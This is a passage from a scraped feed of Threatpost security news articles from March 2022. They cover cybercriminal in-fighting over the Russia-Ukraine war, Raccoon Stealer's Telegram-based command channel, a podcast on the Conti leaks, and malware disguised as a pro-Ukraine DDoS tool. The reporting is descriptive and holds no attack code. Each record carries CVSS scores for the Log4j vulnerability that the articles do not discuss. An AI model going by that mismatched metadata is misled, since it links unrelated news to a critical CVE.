trafficking data from high-profile database leaks \u2013 published a statement titled \u201cRAIDFORUMS SANCTIONS ON RUSSIA.\u201d\n\n> ANY USER FOUND TO BE CONNECTING FROM RUSSIA WILL BE BANNED! THIS IS NOT A JOKE, WE DO NOT SUPPORT THE KREMLIN.\n\nShortly after the statement was published, RaidForums\u2019 main server was taken down by unknown enemies. It remained down as of March 4, according to ACTI.\n\nThe same is true in the opposite direction. The conflict \u201chas led some actors to exclusively sell their services, such as network accesses, to pro-Russian actors,\u201d researchers wrote, and inspired increased attacks against Western targets.\n\n## How This Will Hurt the West\n\nIt might appear, at first glance, that civil war in the cyber underground is a good thing. After all, if they\u2019re fighting each other they won\u2019t have time to annoy the rest of us, right?\n\nIn fact, the exact opposite is true.\n\n\u201cThe primary effect of this political divide so far,\u201d the researchers observed, \u201cis an increased and prolonged threat from underground actors aimed at Western targets, owed to the galvanization of pro-Russian actors and their targeted efforts that focus on \u2018enemies of Russia.'\u201d\n\nNationalist fervor is even motivating cybercriminals to open their arms and welcome previously shunned ransomware groups.\n\nIn response to the [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) attack last May, Western governments and law enforcement began cracking down harder than ever on ransomware groups. In response \u2013 to avoid getting the stink on them, too \u2013 underground admins banned those groups.\n\n\u201cWhile ransomware actors did not disappear from the underground,\u201d wrote the researchers, \u201cthe ban did make it harder for them to acquire tools, recruit affiliates, or gain exploits or accesses, thereby reducing ransomware actors\u2019 abilities to scale their operations.\u201d\n\nNow, \u201cmany underground actors call for the return of ransomware groups to the mainstream underground.\u201d\n\nThe consequence of bringing ransomware groups back into the fold \u201cwould not only enable those actors to target Western organizations more efficiently but also embolden them, as other underground actors would likely herald ransomware actors\u2019 return and give those ransomware actors perceived moral reason to conduct attacks,\u201d the report concluded.\n\n## Increasingly Targeting Critical Infrastructure\n\nThe report described an increasing volume of attacks against the West, \u201cespecially in the resources, government, media, financial and insurance industries,\u201d the report said. \u201cThe targeting of financial and insurance entities is due to the perception that they are the working arms of Western financial sanctions, whereas the targeting of utilities and resources entities is due to those organizations\u2019 importance as critical national infrastructure.\u201d\n\nCritical infrastructure will be of particular concern, especially if ransomware groups have the political motive \u2013 plus the tools of the rest of the underground community at their disposal.\n\n\u201cOrganizations within telecommunications, IT, government and critical infrastructure are no doubt on a heightened level of security with the current events in the geopolitical environment,\u201d James McQuiggan of KnowBe4 told Threatpost via email, but \u201ccybersecurity is finally becoming an important topic for the government, considering the number of attacks the various agencies have dealt with over the past number of years.\u201d\n\nIf the cyber onslaught in Ukraine extends West, will the United States and the European Union [be ready](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>)?\n\nThe answer to that question may arrive soon.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T13:52:37", "type": "threatpost", "title": "Cybercrooks\u2019 Political In-Fighting Threatens the West", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T13:52:37", "id": "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "href": "https://threatpost.com/cybercrooks-political-in-fighting-threatens-the-west/178899/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T15:13:04", "description": "A credential stealer that first rose to popularity a couple of years ago is now abusing Telegram for command-and-control (C2). A range of cybercriminals continue to widen its attack surface through creative distribution means like this, researchers have reported.\n\n[Raccoon Stealer](<https://threatpost.com/malwarebytes-copycat-site-raccoon-stealer/154638/>), which first appeared on the scene in April 2019, has added the ability to store and update its own actual C2 addresses on Telegram\u2019s infrastructure, according to a blog post published by [Avast Threat Labs](<https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/>) this week. This gives them a \u201cconvenient and reliable\u201d command center on the platform that they can update on the fly, researchers said.\n\nThe malware \u2013 believed to be developed and maintained by Russia-affiliated cybercriminals \u2013 is at its core a credential stealer but is capable of a range of nefarious activity. It can steal not only passwords but also cookies, saved logins and forms data from browsers, login credentials from email clients and messengers, files from crypto wallets, data from browser plugins and extensions, and arbitrary files, based on commands from its C2.\n\n\u201cIn addition, it\u2019s able to download and execute arbitrary files by command from its C2,\u201d Avast Threat Labs researcher [Vladimir Martyanov](<https://decoded.avast.io/author/vladimirmartyanov/>) wrote in the post. This, in combination with active development and promotion on underground forums, makes Raccoon Stealer \u201cprevalent and dangerous,\u201d he said.\n\nUpon its release in 2019, cybercriminals [quickly adopted](<https://threatpost.com/raccoon-malware-steal-data/149525/>) the malware because of its user-friendly malware-as-a-service (MaaS) model, which has given them a quick and easy way to make money by stealing sensitive data.\n\n## **Creative Distribution**\n\nEarly on, attackers were seen delivering Raccoon Stealer [via an .IMG file](<https://threatpost.com/raccoon-stealer-malware-scurries-past-microsoft-messaging-gateways/150545/>) hosted on a hacker-controlled Dropbox account in business email compromise (BEC) campaigns that targeted financial institutions and other organizations.\n\nMore recently, Avast Threat Labs researchers observed a number of new and creative ways attackers are distributing Raccoon Stealer, Martyanov said.\n\n\u201cTaking into account that Raccoon Stealer is for sale, its distribution techniques are limited only by the imagination of the end buyers,\u201d he wrote.\n\nIn addition to being spread by two loaders \u2013 Buer Loader and GCleaner \u2013 attackers also are distributing Raccoon Stealer via fake game cheats, patches for cracked software \u2013 including hacks and mods for Fortnite, Valorant and NBA2K22 \u2013 or other software, Martyanov wrote.\n\nCybercriminals also are taking care to try to evade detection by packing the credential stealer, using Themida or malware packers, with some samples observed being packed more than five times in a row with the same packer, he added.\n\n## **Abusing C2 in Telegram**\n\nThe report detailed how the latest version of Raccoon Stealer communicates with C2 within Telegram: There are four \u201ccrucial\u201d values for its C2 communication, which are hardcoded in every Raccoon Stealer sample, according to the post. They are:\n\n * -MAIN_KEY, which has been changed four times during the year;\n * -URLs of Telegram gates with a channel name;\n * -BotID, a hexadecimal string, sent to the C2 every time; and\n * -TELEGRAM_KEY, a key to decrypt the C2 address obtained from Telegram Gate.\n\nTo hijack Telegram for its C2, the malware first decrypts MAIN_KEY, which it uses to decrypt Telegram gates URLs and BotID. The stealer then uses Telegram gate to get to its real C2 using a string of queries that eventually allow it to use the Telegram infrastructure to store and update actual C2 addresses, Martyanov wrote.\n\nBy downloading and executing arbitrary files from a command from C2, the stealer also is able to distribute malware. Avast Threat Labs collected about 185 files, with a total size of 265 megabytes \u2013 including downloaders, clipboard crypto stealers and the WhiteBlackCrypt ransomware \u2013 that were being distributed by Raccoon Stealer.\n\n## **Avoiding Russian Entities**\n\nOnce executed, Racoon Stealer starts checking for the default user locale set on the infected device and won\u2019t work if it\u2019s one of the following: Russian, Ukrainian, Belarusian, Kazakh, Kyrgyz, Armenian, Tajik or Uzbek. This is likely because the developers themselves are Russian, researchers believe.\n\nHowever, Avast Threat Labs found that in recent activity, \u201cthe country where we have blocked the most attempts is Russia, which is interesting because the actors behind the malware don\u2019t want to infect computers in Russia or Central Asia,\u201d Martyanov wrote.\n\nThis could be because \u201cthe attacks spray and pray, distributing the malware around the world,\u201d he noted. The malware doesn\u2019t check for the location of the user until it actually reaches a device; if it finds that the device is located in a region developers don\u2019t want to target, it won\u2019t run.\n\n\u201cThis explains why we detected so many attack attempts in Russia; we block the malware before it can run, i.e. before it can even get to the stage where it checks for the device\u2019s locale,\u201d Martyanov wrote. \u201cIf an unprotected device that comes across the malware with its locale set to English or any other language that is not on the exception list but is in Russia, it would still become infected.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-11T15:03:20", "type": "threatpost", "title": "Raccoon Stealer Crawls Into Telegram", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T15:03:20", "id": "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "href": "https://threatpost.com/raccoon-stealer-telegram/178881/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T03:51:25", "description": "Information about nuclear plants and air force capabilities. Conti ransomware gang crooks [conjecturing](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>) that the National Security Agency (NSA) was maybe behind the mysterious, months-long [TrickBot](<https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/>) [lull](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>). [Doxxed data](<https://www.theregister.com/2022/03/02/russian_soldier_leaks/>) about 120K Russian soldiers.\n\nThose are just some of the sensitive, valuable data that\u2019s being hacked out of Russia in the [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) \u2013 a war that erupted [even before](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) the country invaded Ukraine.\n\n\u201cEveryone is so focused on Russia hacking the world, but the world has been hacking Russia\u2026. And dumping a lot of critical data on military, nuclear plants, etc.,\u201d said Vinny Troia, cybersecurity Ph.D. and founder of [ShadowByte](<https://shadowbyte.com/>), a dark web threat intelligence and cyber fraud investigations firm.\n\nHe\u2019s one of an untold number of experts on dark-web threat intelligence who\u2019ve been pouring over the intel that\u2019s been flooding out of practically every nook and cranny of the internet: data that\u2019s being posted on Twitter, Telegram and within the multiple dumps of insider knowledge about the Conti ransomware gang posted by the Ukrainian supporter ContiLeaks.\n\n![specops logo](https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/16111526/Specops-Logo.png)\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThat ongoing dump, which has included [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti and TrickBot, a decryptor (that doesn\u2019t help recent victims whose files have been encrypted by the Conti gang, unfortunately), and much more, stopped yesterday when the Conti gang shut down its Jabber servers, Troia told Threatpost on Wednesday.\n\nHe visited the Threatpost podcast to update us on the mountain of data about Russia that intelligence experts are now slogging through.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030222_Vinny_Troia_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>). Also, see below for a lightly edited transcript. \n\n\n## Lightly Edited Transcript\n\n**Lisa Vaas:** Listeners, welcome to the Threatpost podcast. My guest today is Vinny Troia, cybersecurity PhD and founder of ShadowByte, a dark web threat intelligence and cyber fraud investigations firm. Today, we\u2019re going to focus on all of the data that\u2019s being leaked on Russia as a result of its invasion of Ukraine.\n\n**Lisa Vaas:** Thanks for coming on the podcast. Vinny, before we jump in, could you give us a bit of your background, please?\n\n**Vinny Troia:** Sure. Thanks for having me. Yes. So my background I come from a DOD background did a lot of work for surface deployment command. And yeah, I was there for about, I think six or seven years before moving over to private sector.\n\n**Vinny Troia:** And while I was there, I did a lot of work in compliance and random security hacking projects, a lot of red teaming, pen testing. And then eventually I started my own firm. Fast forward to today, our focus now is primarily dealing with a lot of ransomware cases, incident response, and we do a lot of ransom negotiations as well.\n\n**Vinny Troia:** We\u2019re constantly focused on dark web threat actors and any of the players, really.\n\n**Lisa Vaas:** Thank you for that. And well this past week must be just a flurry with the dark web activity around Ukraine and Russia. So in an email, you were talking about how everyone is so focused on Russia hacking the world, but the world has been also hacking Russia and dumping a lot of critical data on military nuclear plants, etc.\n\n**Lisa Vaas:** Where is your Intel coming from? Are there any forums in particular that you\u2019re clued into or is that something you can\u2019t even discuss?\n\n**Vinny Troia:** it\u2019s not even like that. It\u2019s a, I mean, it\u2019s literally everywhere. I mean, there\u2019s Telegram channels. I mean, some is just being pasted right on Twitter.\n\n**Vinny Troia:** I mean, it\u2019s literally coming from all angles at this point.\n\n**Lisa Vaas:** Well, tell me what you\u2019re seeing.\n\n**Vinny Troia:** I\u2019d say last month, there was a lot of data coming out about Ukrainian citizens. I mean, a lot. So that was kind of interesting, almost like a precursor to what was happening.\n\n**Vinny Troia:** And now it\u2019s almost like, the rest of the world that\u2019s really pissed and started hacking back and you\u2019re seeing so much data coming out. I\u2019m actually looking for sorry, as we speak, I\u2019m going through some of this data. I mean, there\u2019s stuff on a nuclear plants, some of their air force capabilities.\n\n**Vinny Troia:** There\u2019s another database that I just recently came across that is about a hundred thousand of their military members with photos, passport numbers, things like that. I mean, it\u2019s really just data coming from all depths of. From other infrastructure,\n\n**Lisa Vaas:** well, who, who, who is the primary sources?\n\n**Lisa Vaas:** I mean, I know that anonymous of course has jumped in to, to, to wage war on behalf of Ukraine, cyber war on behalf of Ukraine. And I know that you can put out a call for help from cyber experts on this too. So who, who exactly is, is. Hacking this stuff out of Russia.\n\n**Vinny Troia:** I mean, I, honestly, I couldn\u2019t tell you, I mean, it\u2019s coming, like I said, it\u2019s coming from all sorts of places.\n\n**Vinny Troia:** Right. And when things get leaked, I mean, they just get leaked from various [sources\u2019] usernames on forums or Telegram channels. And so you never really know who it\u2019s coming from. It is interesting that the world kind of banded together against this. And Russia was supposed to have this big cyber arsenal against them.\n\n**Vinny Troia:** And it\u2019s really funny that Joe Biden didn\u2019t mention security once in the state of the union last night, being that it was such a big deal and everybody\u2019s been talking about it.\n\n**Lisa Vaas:** Yeah. And, and I remember it was an NBC news last week or, or was reporting on the big cyberattacks, the major offensive cyberattacks that were being discussed at the White House, but then the White House denied [considering offensive cyberattacks].\n\n**Vinny Troia:** The news has been all about cyberattacks and Russia\u2019s capabilities and it\u2019s such a priority, but it just wasn\u2019t even mentioned once. I just, I find that really strange, but regardless, it\u2019s nice that the world kind of banded together to really come after Russia. One of the most, honestly, just incredibly fascinating things is all these leaks that have been occurring regarding the Conti ransomware. Yes. And they\u2019re arguably the largest or at least one of the top few largest ransomware groups in the world. And I mean, they\u2019re just having everything leak: source code, recovery, keys, chat logs.\n\n**Vinny Troia:** I mean, as early, as recently as today with the most recent chat logs that came out, so somebody still has access to their servers and I haven\u2019t even had a chance to read the ones from today.\n\n**Lisa Vaas:** I just wrote up the second dump and I didn\u2019t even know there was more posted today. It\u2019s so hard to keep up. Can we talk a little bit about those dumps? Now as I understand it, it\u2019s the decryptor for version two of the Conti Lock ransomware software [that was leaked]. That\u2019s not even going to be usable to anybody because it was for an older version.\n\n**Lisa Vaas:** How is this going to affect Conti? Another one of my sources was telling me that just one of the gang\u2019s groups got hit by this [leak] and everybody else is pretty much doing fine. They\u2019re carrying on business as usual.\n\n**Vinny Troia:** I think what\u2019s really interesting. And they talked about this in one of the, in some of the logs. So Conti uses, or used, this one piece of software called TrickBot in order to disseminate and \u2026 one of the or groupings of the chat log showed that the NSA came after TrickBot specifically.\n\n**Vinny Troia:** I don\u2019t know whether or not they reverse engineered or what they did, but I mean, they were able to shut it down for a couple of weeks just by changing patch numbers and uploading them to a server that would accept the changes. And so what they did was they maxed out the maximum patch number.\n\n**Vinny Troia:** The software couldn\u2019t take any new updates at that point. So they effectively shut it down for a little bit. That was actually really amazing.\n\n**Lisa Vaas:** I totally missed that. Which repository was that in? What\u2019s the name of the repository?\n\n**Vinny Troia:** It\u2019s all JSON files.\n\n**Lisa Vaas:** Everybody knew that TrickBot pretty much shut down for a few months, but I didn\u2019t know that about the NSA piece.\n\n**Vinny Troia:** It\u2019s presumed to be the NSA, given the level of skill that was involved, we\u2019ll call it finesse. I would say it would have to be some government agency.\n\n**Lisa Vaas:** Was there chatter about the shutdown?\n\n**Vinny Troia:** Yeah, it\u2019s basically a handful of officials talking about it and how they were shut down and how they basically had to rebuild their infrastructure.\n\n**Vinny Troia:** They were down for a little bit and eventually they came back, but it just shows that they were being targeted by nation states. I think the most interesting thing is, if this really is a Russian operated group, which is what it seems like, then the fact that all these files are being leaked, whether it\u2019s from an insider or somebody who\u2019s a researcher who\u2019s attacking them specifically, I think this is going to have a major toll on Russia\u2019s finances, especially considering this is a group that is averaging what, a couple hundred million dollars a year recurring revenue?\n\n**Lisa Vaas:****** I don\u2019t expect you to know this, but maybe you do: How much of Russia\u2019s economy is actually coming from ransomware or other malware?\n\n**Vinny Troia:** I think the majority, actually. So I think the majority of Russia\u2019s economy is coming from some sort of crime. There\u2019s not a whole lot going on over there. It\u2019s like a big wasteland,\n\n**Lisa Vaas:** Right. The underground members say \u201cprotect the motherland, the motherland protects you. \u201cExcept for when they need some stooges to arrest, some low-level stooges to make the U.S. happy, which happened recently.\n\n**Vinny Troia: **As far as the decryptor [goes], you\u2019re correct. It is for an older version. I think I saw some keys floating around as well, but new code is written on top of old code and it\u2019s not like it was replaced completely. So I would imagine that there will be some fallout from that code base.\n\n**Lisa Vaas:** Yeah, there\u2019s a lot of code to go through. I hear. So what were some other really great finds in the intelligence that we\u2019re getting out of Russia during this crisis?\n\n**Vinny Troia:** It\u2019s information on citizens, it\u2019s information on military members. I\u2019ve seen things on nuclear plants. I can\u2019t speak to what can be done with all of it, honestly, but the point is it\u2019s there and, in the right hands, I\u2019m sure it could be pretty useful.\n\n**Lisa Vaas:** I assume, during these days, it\u2019s just not going to let up.\n\n**Vinny Troia:** No, and like I said, a couple of hours ago we had more leaks from their Jabber server. So I would imagine whoever has access has been able to pull off a lot, and I think [Conti] actually just shut it down finally.\n\n**Lisa Vaas:** So that means they they shut down Jabber. That doesn\u2019t mean that they figured out who the leaker is. Right?\n\n**Vinny Troia:** The person leaking it goes by [ContiLeaks]. But whether or not he\u2019s the one with access, I don\u2019t know. But the point is they figured out that somebody did have access to their Jabber logs. So now they\u2019ve moved servers.\n\n**Lisa Vaas:** Well, awesome. What else can you tell listeners? What can you leave us with?\n\n**Vinny Troia:** I would say that, just because Conti\u2019s out doesn\u2019t mean that the problem is going away anytime soon. So be diligent and keep up with your passwords and make sure that you actually have fresh passwords, because looking at these logs and how they\u2019re getting into a lot of these systems, it\u2019s just using other people\u2019s recycled passwords.\n\n**Vinny Troia:** The hacks they\u2019re using aren\u2019t even that sophisticated. And I mean, even now the majority of hacks are still caused by reused passwords.\n\n**Lisa Vaas:** We can get some intelligence out of the exploits that they\u2019re targeting. I think I saw Zerologin was mentioned as one, and of course we know a lot about their tooling right now. Like the whole Cobalt Strike beacon thing.\n\n**Vinny Troia:** Cobalt Strike\u2019s been a red teaming tool forever. It\u2019s a staple. For pen testers, it\u2019s an amazing tool. And so the fact that they were using it isn\u2019t really a surprise.\n\n**Lisa Vaas:** Well, is there anything surprising that was found in the dumps? I know that we\u2019ve got email addresses of some of the members of the gang.\n\n**Vinny Troia:** You can use that to look for other accounts and potentially start to reverse back to maybe who they are. But I mean, there\u2019s so much information here. I haven\u2019t even gone through maybe a 10th of it. It\u2019s coming up too fast. It\u2019s a full-time job. It takes a full-time team at this point to go through all of this. Because then there was another thing that came out: rocket chat logs from a rocket chat. There\u2019s thousands of logs here.\n\n**Lisa Vaas:** Yeah, that\u2019s pretty bad. When you\u2019ve got a researcher, an intel expert who says he\u2019s getting too much: The firehouse is open so wide. So the takeaways for listeners are that these leaks haven\u2019t stopped, and we don\u2019t even know how many that [ContiLeaks] is promising.\n\n**Vinny Troia:** I mean, the fact that today\u2019s leaks caused the shutdown, I presume caused a shut down of their Jabber server. I\u2019m going to say that well has pretty much run dry. I don\u2019t know what else is going to be released in terms of tools, but I\u2019d say all of this has probably put a dent in everything they\u2019re doing for a little bit.\n\n**Lisa Vaas:** We can hope so, but I don\u2019t think we should assume anything. And that\u2019s what you\u2019re telling us: They\u2019re still going to be active and they\u2019re going to retool anyway. Right. And will resurface.\n\n**Vinny Troia:** Yeah. I was going to say, giving credit to [security journalist Brian] Krebs on this one, one of the things he reported on was that there was a conversation, and I haven\u2019t even made it to the set about how the ransomware groups were being investigated.\n\n**Vinny Troia:** And someone high up in the group basically told them they didn\u2019t have anything to worry about. The investigation was going to go off of them. And that was right around the time that Russia took down REvil. So it was interesting. It\u2019s almost like they had insider information, or maybe they literally were working for [Russia].\n\n**Lisa Vaas:** I think REvil. that takedown, was the one I was thinking about when I alluded to this kind of token law enforcement action on Russia\u2019s part to maybe make the U.S. shut up. Now I have to go read Brian Krebs. Why didn\u2019t I read Brian Krebs earlier today? I have to do that. That\u2019s like a requirement of the job. OK, well, Vinnie, unless you\u2019ve got anything else to add, I\u2019m going to let you go.\n\n**Vinny Troia:** No, all good.\n\n**Lisa Vaas:** I appreciate it. Thank you so much. Thanks for coming on the podcast.\n\n030322 10:49 UPDATE: ContiLeaks, the source of the Conti leaks, is not believed to be the same entity as vx_underground, which has disseminated the leaked files.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype. \n![](https://slack-imgs.com/?c=1&o1=ro&url=https%3A%2F%2Fmedia.threatpost.com%2Fwp-content%2Fuploads%2Fsites%2F103%2F2022%2F02%2F25090838%2FLog4J.jpg)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T16:31:36", "type": "threatpost", "title": "Russia Leaks Data From a Thousand Cuts\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T16:31:36", "id": "THREATPOST:6C547AAC30142F12565AB289E211C079", "href": "https://threatpost.com/russia-leaks-data-thousand-cuts-podcast/178749/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T14:53:17", "description": "Looking to cyber-hassle Russia, Ukrainian sympathizers? Be careful \u2014 malware is making the rounds, disguised as a pro-Ukraine cyber-tool that will turn around and bite you instead, researchers are warning.\n\nIn a Wednesday [threat advisory](<https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html>), Cisco Talos described a campaign it\u2019s observed in which a threat actor was offering a supposed distributed denial-of-service (DDoS) tool on Telegram, that\u2019s purportedly meant to pummel Russian websites.\n\nIn truth, the file is actually the Phoenix infostealer that\u2019s after credentials and cryptocurrency info, according to researchers.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\nResearchers shared one such Telegram come-on, shown below:\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10114749/infostealer-disguised-as-Russian-attack-tool-e1646930888523.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10114749/infostealer-disguised-as-Russian-attack-tool-e1646930888523.jpg>)\n\nInfostealer disguised as a Russian attack tool on Telegram. Source: Cisco Talos.\n\n\u201cWe are glad to remind you about the software we use to attack Russian sites!\u201d the message burbled, waiting to jump on unsuspecting users so as to bleed them of cryptocurrency stored in wallets and MetaMask (a cryptocurrency wallet software commonly associated with non-fungible tokens [NFTs]).\n\n## Cyber-Warzone Flooded with New Threats, Hacker Newbies\n\nThe malware dressed in sheep\u2019s clothing is just one more wrinkle in the cyber-threat landscape \u2013 a landscape that been undergoing seismic shifts leading up to and during Russia\u2019s invasion of Ukraine. The crisis has brought both new threats and an influx of actors \u201cof varying skill,\u201d Cisco said.\n\nFor example, the cyber-warzone has entailed the Conti ransomware gang\u2019s secrets [getting spilled](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) (including a [decryptor and TrickBot code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>)) by a Ukrainian security researcher (per [KrebsOnSecurity](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>), citing Alex Holden, the Ukrainian-born founder of the Milwaukee-based cyber intelligence firm Hold Security), a pro-Ukrainian member; furious phishing campaigns [launched](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) against Ukraine and [those aiding](<https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/>) Ukrainian refugees; the novel FoxBlade [trojan;](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) DDoS [attacks](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) against Ukraine\u2019s military and economy; campaigns using multiple destructive [wipers;](<https://threatpost.com/destructive-wiper-ukraine/177768/>) hackers affiliating themselves with the Anonymous collective [hijacking](<https://www.taiwannews.com.tw/en/news/4466470>) Russian cameras; and more.\n\n\u201cMany of these changes have been brought about by the rise in attacks being[ outsourced](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) to sympathetic people on the internet, which brings about its own unique challenges and threats,\u201d Cisco [outlined](<https://blog.talosintelligence.com/2022/03/ukraine-update.html>). The threat advisory referenced a [tweet](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) exhorting people to join an IT army to fight on the cyber-front.\n\n> We are creating an IT army. We need digital talents. All operational tasks will be given here: <https://t.co/Ie4ESfxoSn>. There will be tasks for everyone. We continue to fight on the cyber front. The first task is on the channel for cyber specialists.\n> \n> \u2014 Mykhailo Fedorov (@FedorovMykhailo) [February 26, 2022](<https://twitter.com/FedorovMykhailo/status/1497642156076511233?ref_src=twsrc%5Etfw>)\n\nSoldiers on the frontlines get shot at, of course, and soldiers on the cyber-frontlines run the risk of getting arrested. After all, no matter how noble the hacking cause, it\u2019s still potentially illegal, Cisco pointed out.\n\n## \u2018Legitimate\u2019 Disbalancer Liberator DDoS Tool\n\nThe malware in the Telegram message brands itself as a \u201cDisbalancer\u201d .ZIP file. There is, in fact, a group called \u201cdisBalancer\u201d that distributes a \u201clegitimate\u201d DDoS attack tool called, ironically enough, Liberator, Cisco found \u2013 a tool for waging cyberwar against \u201cRussian propaganda websites.\u201d\n\n\u201cA quick look at disBalancer\u2019s website shows that the actor uses similar language to the malicious message on Telegram\u2026and promises to target Russian sites with the stated goal of helping to \u2018liberate\u2019 Ukraine,\u201d according to Cisco\u2019s writeup.\n\nThe security company offered a screenshot of the brandjacking Disbalancer Liberator website, shown below. As Cisco pointed 